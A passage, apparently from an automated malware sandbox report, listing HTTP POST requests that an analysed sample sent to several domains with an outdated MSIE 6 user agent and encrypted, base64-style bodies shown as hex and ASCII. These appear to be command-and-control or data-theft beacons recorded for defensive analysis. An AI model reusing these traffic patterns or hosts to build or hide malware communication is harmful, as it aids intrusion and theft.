75 50 78 55 79 38 4e 2b 68 6c 65 52 4d 31 49 6b 67 2f 65 31 50 77 76 44 33 2f 6e 57 36 38 54 35 64 78 47 35 39 4e 65 6b 44 79 37 68 74 73 59 77 4b 2b 6d 49 51 52 47 6f 34 6a 38 66 4a 32 6a 58 45 75 57 70 70 56 54 67 68 49 2b 70 50 4c 54 44 38 47 34 67 78 4a 7a 57 75 6f 75 4b 64 4e 4b 43 48 4b 4b 67 71 74 72 56 41 37 78 47 65 50 4e 74 58 4f 4a 42 70 4a 67 4c 66 37 73 41 54 68 30 4f 70 66 76 2b 69 36 54 61 76 6b 50 6f 70 46 6f 31 63 71 7a 32 76 6e 79 30 6e 6e 45 5a 69 76 41 72 50 36 75 4f 4f 6f 55 4a 45 54 41 79 4a 46 65 35 2f 37 72 73 39 76 45 66 53 6c 79 58 41 57 55 50 42 73 4e 78 49 3d Data Ascii: naRwdeMORpYmnsa9aiYXPAyTkU8JF+NwxzJhBDonF/w/uhttJuN0yM9iUmm1Alh4H6eOQxbOxzQCLhLkZXFg/mkDXxj/QrVZU28l+XQGx7akiF8m7x4eTwg2BSIUT3Oyg1ahSqUMlw+wBTBOmLEpIXbr7H2xUC11JQLnj2P4JySAULY3C1hYuF+5phzlaSzj1GsUjEqCExyI3xDFbBDyCjpokd4tEGAo2doBi/WSW8RsiRyeTNFYtp2MXpWvCfVdm1792qfhlUbZ759lzyCOi3Euj2OmB24lr/OSiAw3bG055sGg7D76uOZO9MlE17bl1waMKMlL7Rh/1WAno5pjz4uPxUy8N+hleRM1Ikg/e1PwvD3/nW68T5dxG59NekDy7htsYwK+mIQRGo4j8fJ2jXEuWppVTghI+pPLTD8G4gxJzWuouKdNKCHKKgqtrVA7xGePNtXOJBpJgLf7sATh0Opfv+i6TavkPopFo1cqz2vny0nnEZivArP6uOOoUJETAyJFe5/7rs9vEfSlyXAWUPBsNxI=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 75 32 42 39 72 37 74 42 55 4a 5a 63 45 76 7a 36 55 73 76 31 51 36 54 44 30 6f 66 42 37 6d 63 45 48 2b 38 68 33 70 37 58 5a 78 67 6f 66 43 6a 72 37 70 78 4f 2f 76 46 48 67 52 41 6f 66 34 61 6a 49 58 39 30 73 66 7a 70 6b 6c 64 75 7a 47 51 52 32 4e 43 37 46 56 2b 59 77 78 38 6f 49 56 70 31 4f 59 55 45 37 48 73 76 35 6b 65 77 43 7a 77 45 2b 48 35 54 42 2b 35 59 34 6c 52 66 35 5a 39 2f 4c 62 53 64 76 51 52 36 42 4a 41 44 6a 45 59 4b 57 65 41 58 51 53 64 75 76 48 4c 53 59 68 43 68 35 67 73 62 6e 46 50 43 39 2b 45 33 64 75 2b 32 35 4a 6e 74 39 32 4c 4b 6d 47 6f 4a 71 37 74 61 61 59 59 62 52 76 62 47 5a 43 6a 35 76 49 6d 7a 47 75 6b 4e 4e 32 58 57 54 47 45 49 4c 44 37 76 57 38 53 71 63 6d 72 68 4f 55 47 72 52 69 4a 69 58 68 2f 46 50 6d 32 64 71 43 31 43 38 2f 47 4e 4c 77 71 6a 2b 34 30 48 64 30 47 47 46 54 52 4d 4a 35 6b 70 41 75 33 58 56 5a 58 39 6d 65 31 47 44 38 6b 47 6d 74 46 38 4b 61 31 4d 52 6a 75 69 38 75 46 33 49 6a 2f 43 75 2b 30 55 41 4e 71 57 38 58 45 42 35 66 59 43 44 6c 67 2b 64 66 2b 65 2b 61 59 59 75 56 51 6e 4e 56 72 72 6b 36 75 41 4b 57 59 79 33 6c 4f 4b 6e 64 63 71 38 6d 4b 69 47 2b 57 44 6b 41 30 5a 79 39 69 4b 51 78 77 67 51 79 52 48 6e 4c 58 33 46 46 42 35 69 47 6a 46 51 48 69 76 69 59 34 36 6c 52 75 41 70 67 6c 63 50 33 71 75 70 48 63 71 44 42 35 70 4f 55 52 31 36 43 61 64 6d 57 53 2f 59 35 65 42 78 43 72 35 41 41 77 66 36 2f 50 52 4e 2b 72 36 62 47 36 72 39 76 55 34 6c 32 43 37 67 6f 2f 76 74 6b 35 6a 6d 44 65 44 37 47 4a 59 6a 55 4f 4f 58 62 6b 4a 46 47 4f 50 77 73 43 43 72 57 71 6a 70 6e 54 56 2b 52 62 54 34 6d 65 59 30 48 50 63 37 39 75 6f 51 64 6e 39 35 48 36 67 Data Ascii: u2B9r7tBUJZcEvz6Usv1Q6TD0ofB7mcEH+8h3p7XZxgofCjr7pxO/vFHgRAof4ajIX90sfzpklduzGQR2NC7FV+Ywx8oIVp1OYUE7Hsv5kewCzwE+H5TB+5Y4lRf5Z9/LbSdvQR6BJADjEYKWeAXQSduvHLSYhCh5gsbnFPC9+E3du+25Jnt92LKmGoJq7taaYYbRvbGZCj5vImzGukNN2XWTGEILD7vW8SqcmrhOUGrRiJiXh/FPm2dqC1C8/GNLwqj+40Hd0GGFTRMJ5kpAu3XVZX9me1GD8kGmtF8Ka1MRjui8uF3Ij/Cu+0UANqW8XEB5fYCDlg+df+e+aYYuVQnNVrrk6uAKWYy3lOKndcq8mKiG+WDkA0Zy9iKQxwgQyRHnLX3FFB5iGjFQHiviY46lRuApglcP3qupHcqDB5pOUR16CadmWS/Y5eBxCr5AAwf6/PRN+r6bG6r9vU4l2C7go/vtk5jmDeD7GJYjUOOXbkJFGOPwsCCrWqjpnTV+RbT4meY0HPc79uoQdn95H6g
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 69 4e 36 36 79 38 42 38 57 5a 5a 4e 5a 78 65 52 6b 38 6c 75 74 66 4f 42 4f 44 75 6f 65 6f 4b 6c 39 4a 2f 36 53 56 65 65 33 2b 4b 59 77 42 73 53 55 41 46 65 36 64 55 41 79 50 4d 38 48 5a 34 4d 5a 75 57 32 7a 71 45 65 65 74 7a 4b 6d 73 71 4c 6d 62 78 51 6d 4a 58 44 48 38 2f 39 2b 59 6d 4b 39 71 7a 77 45 53 6e 43 4a 4b 32 43 38 4d 59 58 71 79 75 4f 75 74 4f 47 33 4f 6a 76 66 36 32 4d 6f 51 39 38 50 35 65 70 30 50 64 49 32 48 49 38 43 39 4d 73 70 50 51 45 73 2b 6e 47 61 47 79 2f 66 44 34 4f 47 5a 33 70 57 4a 34 48 64 55 31 55 46 4f 74 6f 46 63 6a 44 54 73 41 56 53 67 71 34 45 45 7a 51 78 4c 64 6a 42 36 53 54 65 49 43 4f 75 4d 31 77 53 74 67 62 50 44 55 51 76 30 58 70 72 4f 2b 34 38 55 74 76 79 55 70 64 32 41 6d 43 39 75 65 63 31 65 62 55 64 66 48 77 4f 6c 31 44 7a 59 66 32 2b 63 66 79 7a 62 43 30 4c 47 75 35 76 65 4d 33 4a 2f 44 69 5a 32 30 43 4d 4d 37 2b 6b 6f 76 6d 6c 2f 70 4d 4f 37 43 57 37 46 56 41 75 6d 41 63 54 38 70 75 33 47 79 7a 57 38 41 44 44 72 54 31 66 4b 46 6a 5a 36 43 62 2f 38 43 35 55 47 4f 4b 38 48 32 68 73 78 55 71 79 5a 42 49 76 34 67 4b 41 6e 44 4c 4f 39 52 31 35 2b 5a 49 79 36 68 6a 64 73 58 70 46 47 78 61 68 50 76 53 41 63 73 74 42 76 61 43 6d 56 5a 2b 30 48 2f 43 37 38 39 37 4f 53 44 42 2f 65 66 50 4d 5a 41 39 2b 72 37 79 4e 32 59 41 58 72 5a 5a 55 71 64 53 47 48 6f 39 52 30 76 50 4e 63 36 68 35 48 55 4d 4b 77 41 36 6e 49 63 58 70 7a 30 56 6e 42 78 38 66 6a 59 41 55 5a 47 6a 73 6c 43 42 4c 2b 30 79 74 38 41 45 54 67 45 34 33 65 4a 74 66 4d 62 56 6a 6c 65 65 45 4a 7a 32 36 55 55 53 6b 6b 2b 4e 41 64 7a 64 32 64 43 57 2b 39 73 32 59 79 71 6e 66 4e 32 4d 72 61 47 67 78 34 69 72 39 59 52 6f 52 6a 4a 31 70 39 51 44 47 50 70 78 78 74 51 6c 34 65 62 38 35 43 33 77 Data Ascii: iN66y8B8WZZNZxeRk8lutfOBODuoeoKl9J/6SVee3+KYwBsSUAFe6dUAyPM8HZ4MZuW2zqEeetzKmsqLmbxQmJXDH8/9+YmK9qzwESnCJK2C8MYXqyuOutOG3Ojvf62MoQ98P5ep0PdI2HI8C9MspPQEs+nGaGy/fD4OGZ3pWJ4HdU1UFOtoFcjDTsAVSgq4EEzQxLdjB6STeICOuM1wStgbPDUQv0XprO+48UtvyUpd2AmC9uec1ebUdfHwOl1DzYf2+cfyzbC0LGu5veM3J/DiZ20CMM7+kovml/pMO7CW7FVAumAcT8pu3GyzW8ADDrT1fKFjZ6Cb/8C5UGOK8H2hsxUqyZBIv4gKAnDLO9R15+ZIy6hjdsXpFGxahPvSAcstBvaCmVZ+0H/C7897OSDB/efPMZA9+r7yN2YAXrZZUqdSGHo9R0vPNc6h5HUMKwA6nIcXpz0VnBx8fjYAUZGjslCBL+0yt8AETgE43eJtfMbVjleeEJz26UUSkk+NAdzd2dCW+9s2YyqnfN2MraGgx4ir9YRoRjJ1p9QDGPpxxtQl4eb85C3w
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 58 73 76 38 69 6f 46 69 56 35 61 30 6c 31 63 71 59 46 6d 33 54 6c 71 4f 6e 68 48 2f 50 55 73 43 52 53 46 54 78 4e 4e 65 78 57 42 4e 36 57 76 69 45 37 67 51 2f 32 52 45 51 74 4f 71 39 2b 31 57 74 53 35 6f 38 55 69 52 6c 71 64 62 44 62 57 59 59 58 59 69 55 6a 70 54 74 34 72 31 74 47 33 71 36 48 32 77 48 33 6a 63 49 58 4c 54 44 5a 30 56 37 64 38 7a 2b 4b 67 55 38 73 2f 75 6b 50 59 51 6d 70 54 66 4d 52 75 49 47 6a 57 45 65 55 75 69 30 51 5a 57 37 75 44 4b 5a 2f 4c 58 55 38 7a 44 79 6e 69 50 5a 4e 55 50 6f 42 6a 6f 4e 64 74 58 4a 63 42 44 36 4d 43 79 67 78 44 78 6c 76 61 48 4a 6a 5a 50 72 56 64 31 6b 59 49 7a 6e 39 61 4d 44 37 67 45 7a 65 44 37 45 74 5a 54 47 49 4f 78 35 61 63 33 39 51 64 6d 49 7a 52 2f 68 37 32 51 59 42 68 4e 56 5a 50 79 35 32 41 4b 64 2b 52 30 57 77 33 5a 42 46 4d 31 35 57 5a 6f 49 41 72 4b 74 42 54 4e 77 48 35 6c 41 4f 66 6e 43 52 4d 32 50 5a 43 56 45 71 4d 64 42 61 62 4e 2f 43 37 64 49 30 49 66 30 4c 55 67 67 51 66 34 6b 32 37 64 34 46 30 4c 33 64 4a 62 59 4d 64 59 65 6e 59 32 6a 70 61 63 31 6f 33 45 65 70 70 34 49 59 5a 6f 38 74 6c 38 44 46 36 30 38 78 64 6b 6d 6a 4b 47 79 38 55 6a 36 35 65 4a 4e 70 37 75 76 58 46 49 50 6c 2b 64 6c 6c 79 52 71 67 6b 38 57 54 53 34 4c 44 65 68 50 44 30 74 55 4e 5a 78 2f 75 57 58 7a 6c 52 35 4b 34 5a 35 62 6b 33 47 44 77 4e 45 75 45 74 57 4e 43 50 41 77 65 50 6a 5a 74 55 70 38 48 57 63 5a 34 5a 6a 56 68 53 52 58 4c 77 68 35 67 38 41 54 49 54 4b 4a 57 30 41 69 43 67 35 53 48 41 2b 7a 65 61 2f 4a 6a 33 75 53 4d 68 75 70 52 55 36 38 71 63 48 48 6f 4f 51 66 2b 67 2b 57 64 56 4f 39 48 7a 4c 76 62 48 6a 63 4b 54 7a 4a 76 43 2f 58 53 55 59 46 57 42 4a 4d 7a 53 48 30 61 54 6d 39 46 63 56 4f 73 53 69 47 52 55 68 53 51 4a 7a 49 72 31 62 69 72 4c 4b 58 35 2b 74 6a 4a 79 56 50 77 44 43 56 2b 51 6d Data Ascii: Xsv8ioFiV5a0l1cqYFm3TlqOnhH/PUsCRSFTxNNexWBN6WviE7gQ/2REQtOq9+1WtS5o8UiRlqdbDbWYYXYiUjpTt4r1tG3q6H2wH3jcIXLTDZ0V7d8z+KgU8s/ukPYQmpTfMRuIGjWEeUui0QZW7uDKZ/LXU8zDyniPZNUPoBjoNdtXJcBD6MCygxDxlvaHJjZPrVd1kYIzn9aMD7gEzeD7EtZTGIOx5ac39QdmIzR/h72QYBhNVZPy52AKd+R0Ww3ZBFM15WZoIArKtBTNwH5lAOfnCRM2PZCVEqMdBabN/C7dI0If0LUggQf4k27d4F0L3dJbYMdYenY2jpac1o3Eepp4IYZo8tl8DF608xdkmjKGy8Uj65eJNp7uvXFIPl+dllyRqgk8WTS4LDehPD0tUNZx/uWXzlR5K4Z5bk3GDwNEuEtWNCPAwePjZtUp8HWcZ4ZjVhSRXLwh5g8ATITKJW0AiCg5SHA+zea/Jj3uSMhupRU68qcHHoOQf+g+WdVO9HzLvbHjcKTzJvC/XSUYFWBJMzSH0aTm9FcVOsSiGRUhSQJzIr1birLKX5+tjJyVPwDCV+Qm
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 77 57 4b 69 71 59 69 78 59 4a 61 43 37 63 2f 65 79 79 64 63 76 50 73 35 73 6c 6f 51 38 38 75 32 50 44 30 33 79 64 75 79 38 31 71 49 56 47 34 63 56 2b 6f 6a 34 43 79 37 58 51 70 57 38 55 70 4a 38 68 66 2f 73 77 6b 57 49 45 73 70 4a 62 4c 35 49 33 69 64 58 36 58 53 67 44 6c 72 53 6d 6f 74 66 42 56 38 2f 6f 73 43 66 59 30 56 6a 71 4c 64 68 65 57 70 62 55 35 6f 56 51 61 51 4a 46 34 5a 6b 62 35 67 71 53 35 5a 39 42 45 76 49 44 70 4f 38 7a 77 78 58 71 51 73 63 42 6d 77 4c 30 71 4f 6f 59 69 37 48 59 6c 6c 58 4f 55 31 61 6f 55 72 68 6a 51 54 43 4e 2b 59 75 79 6f 7a 71 5a 56 38 50 55 51 55 37 53 57 72 6c 59 67 52 45 61 45 34 32 4d 68 37 67 4a 4f 78 54 67 79 76 2f 74 43 70 57 76 35 41 57 48 48 4d 32 6c 71 61 6a 71 77 6c 43 32 4e 78 66 6a 33 75 48 42 2f 4b 57 64 6a 50 5a 4f 38 61 47 57 69 50 39 76 58 59 38 5a 7a 58 74 2b 33 53 6f 35 4f 2f 64 37 61 30 43 57 77 55 57 73 58 2b 38 4d 41 57 4f 56 61 74 76 6f 4a 32 78 50 58 51 39 74 2f 30 4e 38 48 49 35 56 6e 43 31 73 39 45 79 7a 31 49 66 51 61 76 61 6b 33 45 6e 53 52 5a 6f 54 52 4b 44 6e 58 73 4d 77 66 4a 57 45 76 79 49 48 72 58 7a 41 54 36 54 62 4e 76 2f 51 2f 32 62 33 53 2f 55 70 2b 33 77 72 66 38 43 61 74 30 48 79 50 35 68 61 2f 68 65 42 32 4c 44 79 4f 74 44 31 47 36 52 46 76 4a 61 39 79 78 67 30 74 59 6b 6c 67 67 72 39 43 73 76 38 48 4b 37 57 75 6d 43 6c 44 44 5a 30 2f 4d 6a 76 77 76 6f 6c 70 67 30 6b 4a 79 62 34 56 47 70 4f 54 55 65 4b 7a 51 33 53 71 5a 75 37 34 69 77 71 51 52 45 68 71 43 6e 44 35 76 70 44 59 76 55 7a 6f 63 62 5a 4d 35 6a 58 39 67 4d 46 6d 52 58 37 53 36 63 58 65 41 50 68 6f 37 41 52 66 45 39 41 38 56 68 5a 47 62 51 74 62 68 6d 53 52 52 4e 79 72 33 75 37 31 36 63 71 31 73 76 61 49 39 48 69 47 46 4d 4c 57 4d 66 2f 54 34 41 62 4f 4e 6a 37 4f 53 51 39 78 6f 36 51 3d 3d Data Ascii: wWKiqYixYJaC7c/eyydcvPs5sloQ88u2PD03yduy81qIVG4cV+oj4Cy7XQpW8UpJ8hf/swkWIEspJbL5I3idX6XSgDlrSmotfBV8/osCfY0VjqLdheWpbU5oVQaQJF4Zkb5gqS5Z9BEvIDpO8zwxXqQscBmwL0qOoYi7HYllXOU1aoUrhjQTCN+YuyozqZV8PUQU7SWrlYgREaE42Mh7gJOxTgyv/tCpWv5AWHHM2lqajqwlC2Nxfj3uHB/KWdjPZO8aGWiP9vXY8ZzXt+3So5O/d7a0CWwUWsX+8MAWOVatvoJ2xPXQ9t/0N8HI5VnC1s9Eyz1IfQavak3EnSRZoTRKDnXsMwfJWEvyIHrXzAT6TbNv/Q/2b3S/Up+3wrf8Cat0HyP5ha/heB2LDyOtD1G6RFvJa9yxg0tYklggr9Csv8HK7WumClDDZ0/Mjvwvolpg0kJyb4VGpOTUeKzQ3SqZu74iwqQREhqCnD5vpDYvUzocbZM5jX9gMFmRX7S6cXeAPho7ARfE9A8VhZGbQtbhmSRRNyr3u716cq1svaI9HiGFMLWMf/T4AbONj7OSQ9xo6Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 69 4e 36 36 79 38 42 38 57 5a 5a 4e 5a 78 65 52 6b 38 6c 75 74 66 4f 42 4f 44 75 6f 65 6f 4b 6c 39 4a 2f 36 53 56 65 65 33 2b 4b 59 77 42 73 53 55 41 46 65 36 64 55 41 79 50 4d 38 48 5a 34 4d 5a 75 57 32 7a 71 45 65 65 74 7a 4b 6d 73 71 4c 6d 62 78 51 6d 4a 58 44 48 38 2f 39 2b 59 6d 4b 39 71 7a 77 45 53 6e 43 4a 4b 32 43 38 4d 59 58 71 79 75 4f 75 74 4f 47 33 4f 6a 76 66 36 32 4d 6f 51 39 38 50 35 65 70 30 50 64 49 32 48 49 38 43 39 4d 73 70 50 51 45 73 2b 6e 47 61 47 79 2f 66 44 34 4f 47 5a 33 70 57 4a 34 48 64 55 31 55 46 4f 74 6f 46 63 6a 44 54 73 41 56 53 67 71 34 45 45 7a 51 78 4c 64 6a 42 36 53 54 65 49 43 4f 75 4d 31 77 53 74 67 62 50 44 55 51 76 30 58 70 72 4f 2b 34 38 55 74 76 79 55 70 64 32 41 6d 43 39 75 65 63 31 65 62 55 64 66 48 77 4f 6c 31 44 7a 59 66 32 2b 63 66 79 7a 62 43 30 4c 47 75 35 76 65 4d 33 4a 2f 44 69 5a 32 30 43 4d 4d 37 2b 6b 6f 76 6d 6c 2f 70 4d 4f 37 43 57 37 46 56 41 75 6d 41 63 54 38 70 75 33 47 79 7a 57 38 41 44 44 72 54 31 66 4b 46 6a 5a 36 43 62 2f 38 43 35 55 47 4f 4b 38 48 32 68 73 78 55 71 79 5a 42 49 76 34 67 4b 41 6e 44 4c 4f 39 52 31 35 2b 5a 49 79 36 68 6a 64 73 58 70 46 47 78 61 68 50 76 53 41 63 73 74 42 76 61 43 6d 56 5a 2b 30 48 2f 43 37 38 39 37 4f 53 44 42 2f 65 66 50 4d 5a 41 39 2b 72 37 79 4e 32 59 41 58 72 5a 5a 55 71 64 53 47 48 6f 39 52 30 76 50 4e 63 36 68 35 48 55 4d 4b 77 41 36 6e 49 63 58 70 7a 30 56 6e 42 78 38 66 6a 59 41 55 5a 47 6a 73 6c 43 42 4c 2b 30 79 74 38 41 45 54 67 45 34 33 65 4a 74 66 4d 62 56 6a 6c 65 65 45 4a 7a 32 36 55 55 53 6b 6b 2b 4e 41 64 7a 64 32 64 43 57 2b 39 73 32 59 79 71 6e 66 4e 32 4d 72 61 47 67 78 34 69 72 39 59 52 6f 52 6a 4a 31 70 39 51 44 47 50 70 78 78 74 51 6c 34 65 62 38 35 43 33 77 Data Ascii: iN66y8B8WZZNZxeRk8lutfOBODuoeoKl9J/6SVee3+KYwBsSUAFe6dUAyPM8HZ4MZuW2zqEeetzKmsqLmbxQmJXDH8/9+YmK9qzwESnCJK2C8MYXqyuOutOG3Ojvf62MoQ98P5ep0PdI2HI8C9MspPQEs+nGaGy/fD4OGZ3pWJ4HdU1UFOtoFcjDTsAVSgq4EEzQxLdjB6STeICOuM1wStgbPDUQv0XprO+48UtvyUpd2AmC9uec1ebUdfHwOl1DzYf2+cfyzbC0LGu5veM3J/DiZ20CMM7+kovml/pMO7CW7FVAumAcT8pu3GyzW8ADDrT1fKFjZ6Cb/8C5UGOK8H2hsxUqyZBIv4gKAnDLO9R15+ZIy6hjdsXpFGxahPvSAcstBvaCmVZ+0H/C7897OSDB/efPMZA9+r7yN2YAXrZZUqdSGHo9R0vPNc6h5HUMKwA6nIcXpz0VnBx8fjYAUZGjslCBL+0yt8AETgE43eJtfMbVjleeEJz26UUSkk+NAdzd2dCW+9s2YyqnfN2MraGgx4ir9YRoRjJ1p9QDGPpxxtQl4eb85C3w
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 2b 4d 41 45 66 45 77 32 58 35 61 5a 37 55 56 6e 74 2f 31 53 48 46 39 54 54 6e 67 6b 34 51 4a 2f 51 41 7a 52 46 73 6a 6b 74 4c 4f 71 4c 57 47 41 58 2b 6d 64 35 51 32 46 75 38 67 42 65 54 6c 6e 4c 58 4b 6c 74 71 55 52 69 6e 39 42 64 56 38 6a 38 63 34 71 72 2b 2b 74 63 67 33 6a 41 63 6f 32 34 74 39 79 51 56 33 6f 52 66 46 59 39 55 77 45 30 61 79 4a 44 52 53 4e 76 6f 66 32 45 78 49 45 57 78 48 70 4c 5a 49 4b 69 45 73 35 4f 38 6b 2f 50 2b 5a 45 78 53 43 72 43 62 32 55 54 44 45 51 65 37 4e 49 6f 52 37 4b 66 6b 7a 2b 4d 78 51 6d 31 43 43 4a 42 50 44 47 62 48 6b 59 67 57 52 42 55 31 44 56 5a 78 72 6b 30 38 51 35 41 66 48 76 47 4f 54 45 4f 41 42 65 41 30 36 46 41 6e 72 67 77 43 71 42 4b 35 32 70 43 45 30 52 48 4d 72 54 50 52 48 73 75 54 32 46 54 7a 74 51 2f 35 37 66 79 75 78 61 6f 79 47 49 43 53 6b 31 5a 4e 45 42 48 34 42 49 62 78 4c 7a 59 6b 70 58 6f 56 48 65 39 6b 68 6f 79 58 6e 72 6d 73 67 51 4e 42 57 41 51 35 6b 64 6c 61 30 74 49 36 6b 56 64 6f 50 6b 44 76 45 64 46 7a 37 4f 33 4b 6f 33 65 63 33 7a 7a 6a 42 55 76 50 4a 45 4a 36 77 76 6e 4e 43 54 54 4f 68 65 6e 77 39 56 78 4e 48 4d 6f 71 4e 36 61 53 2f 4a 54 73 34 4f 6d 4f 52 42 34 5a 4b 75 4f 64 30 50 63 53 58 58 36 53 69 74 73 6e 64 51 65 4c 68 71 36 7a 68 47 54 58 2f 50 66 78 36 4d 48 77 76 4f 67 70 45 57 78 56 5a 6c 64 69 56 34 72 49 4b 55 48 4f 70 7a 56 74 41 44 56 4c 64 68 38 53 57 77 30 61 36 76 4e 43 41 4a 4e 59 64 39 30 76 69 49 42 79 48 58 67 6f 44 62 50 42 69 42 55 59 2b 46 66 6f 46 42 66 2f 61 65 6c 51 6b 64 57 42 62 68 4e 41 48 58 77 4e 66 78 30 46 48 4a 76 48 44 4b 4f 50 71 38 7a 52 65 48 76 32 31 4f 75 4c 54 38 73 52 47 49 54 42 6f 4d 2b 45 62 2b 68 37 69 50 75 54 43 4d 30 56 43 36 30 41 30 51 31 49 45 43 32 58 69 48 37 67 6f 77 52 62 31 79 34 67 3d 3d Data Ascii: +MAEfEw2X5aZ7UVnt/1SHF9TTngk4QJ/QAzRFsjktLOqLWGAX+md5Q2Fu8gBeTlnLXKltqURin9BdV8j8c4qr++tcg3jAco24t9yQV3oRfFY9UwE0ayJDRSNvof2ExIEWxHpLZIKiEs5O8k/P+ZExSCrCb2UTDEQe7NIoR7Kfkz+MxQm1CCJBPDGbHkYgWRBU1DVZxrk08Q5AfHvGOTEOABeA06FAnrgwCqBK52pCE0RHMrTPRHsuT2FTztQ/57fyuxaoyGICSk1ZNEBH4BIbxLzYkpXoVHe9khoyXnrmsgQNBWAQ5kdla0tI6kVdoPkDvEdFz7O3Ko3ec3zzjBUvPJEJ6wvnNCTTOhenw9VxNHMoqN6aS/JTs4OmORB4ZKuOd0PcSXX6SitsndQeLhq6zhGTX/Pfx6MHwvOgpEWxVZldiV4rIKUHOpzVtADVLdh8SWw0a6vNCAJNYd90viIByHXgoDbPBiBUY+FfoFBf/aelQkdWBbhNAHXwNfx0FHJvHDKOPq8zReHv21OuLT8sRGITBoM+Eb+h7iPuTCM0VC60A0Q1IEC2XiH7gowRb1y4g==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 63 7a 35 4c 49 70 71 63 5a 4a 59 73 53 44 66 31 76 55 50 36 51 4e 33 67 73 73 2b 4b 53 47 51 32 62 6c 67 4f 45 76 7a 35 2f 38 66 51 31 34 53 79 54 6e 77 53 49 32 45 39 76 75 46 78 61 6c 4d 2b 39 45 6c 35 37 36 55 32 6c 70 5a 79 4c 68 74 4c 6d 38 50 35 32 70 48 2b 6d 58 6a 53 6a 63 65 41 2b 54 41 75 78 57 30 77 73 54 45 35 32 4d 42 55 6c 6e 65 57 34 6c 57 42 78 66 4c 6c 45 43 42 61 48 64 39 51 30 50 77 58 6c 66 7a 61 67 78 38 52 43 46 56 37 62 4d 35 47 63 68 39 4c 33 65 47 44 6c 59 69 48 45 78 47 72 79 2b 5a 7a 46 30 53 77 56 47 77 6d 4f 39 57 2f 6c 4c 46 37 6b 64 54 39 35 78 42 2f 56 32 30 35 38 36 6b 5a 32 2b 36 57 67 57 6b 59 59 48 47 6e 56 65 58 66 78 44 4f 4c 71 45 6b 7a 38 32 69 44 52 50 74 6e 45 30 66 70 47 79 33 37 62 63 46 4c 6a 63 62 47 42 6d 39 51 6e 65 74 65 5a 6a 30 59 33 6a 47 64 51 51 37 4c 68 6b 61 44 7a 36 69 75 51 38 39 45 55 6b 2b 75 6d 46 45 33 4a 4e 76 50 67 5a 74 47 55 43 5a 41 54 6f 39 4c 79 63 74 32 38 44 68 4c 47 42 4a 4c 68 53 41 44 48 39 4f 4b 6c 64 45 35 61 6a 47 79 6c 7a 49 61 39 34 7a 5a 4e 71 48 52 49 37 48 30 67 6c 31 4c 32 72 43 50 6f 4c 56 6d 6e 6e 6a 67 2b 36 61 31 2b 6a 53 57 49 6d 76 68 38 72 49 53 34 6c 6e 74 34 48 67 6d 4f 61 46 4b 52 38 72 71 66 53 52 65 4b 46 41 6c 31 37 75 43 64 4a 42 64 36 34 57 49 75 48 4f 51 53 43 45 4f 77 7a 66 4e 2b 57 44 36 4f 32 6b 5a 46 6e 6e 4a 69 35 62 66 6d 56 42 77 46 66 59 57 61 52 69 57 2f 49 54 39 4d 69 4b 52 66 46 50 58 37 59 4f 39 48 58 30 48 65 6a 2b 6e 34 71 38 6a 5a 65 48 52 6c 4d 69 79 55 77 38 44 55 45 77 35 57 2f 41 42 75 69 6d 31 43 75 39 64 73 48 30 37 73 52 67 4c 35 68 36 70 4d 77 34 4c 39 63 71 4d 46 6e 63 43 61 4b 38 74 53 67 3d 3d Data Ascii: cz5LIpqcZJYsSDf1vUP6QN3gss+KSGQ2blgOEvz5/8fQ14SyTnwSI2E9vuFxalM+9El576U2lpZyLhtLm8P52pH+mXjSjceA+TAuxW0wsTE52MBUlneW4lWBxfLlECBaHd9Q0PwXlfzagx8RCFV7bM5Gch9L3eGDlYiHExGry+ZzF0SwVGwmO9W/lLF7kdT95xB/V20586kZ2+6WgWkYYHGnVeXfxDOLqEkz82iDRPtnE0fpGy37bcFLjcbGBm9QneteZj0Y3jGdQQ7LhkaDz6iuQ89EUk+umFE3JNvPgZtGUCZATo9Lyct28DhLGBJLhSADH9OKldE5ajGylzIa94zZNqHRI7H0gl1L2rCPoLVmnnjg+6a1+jSWImvh8rIS4lnt4HgmOaFKR8rqfSReKFAl17uCdJBd64WIuHOQSCEOwzfN+WD6O2kZFnnJi5bfmVBwFfYWaRiW/IT9MiKRfFPX7YO9HX0Hej+n4q8jZeHRlMiyUw8DUEw5W/ABuim1Cu9dsH07sRgL5h6pMw4L9cqMFncCaK8tSg==
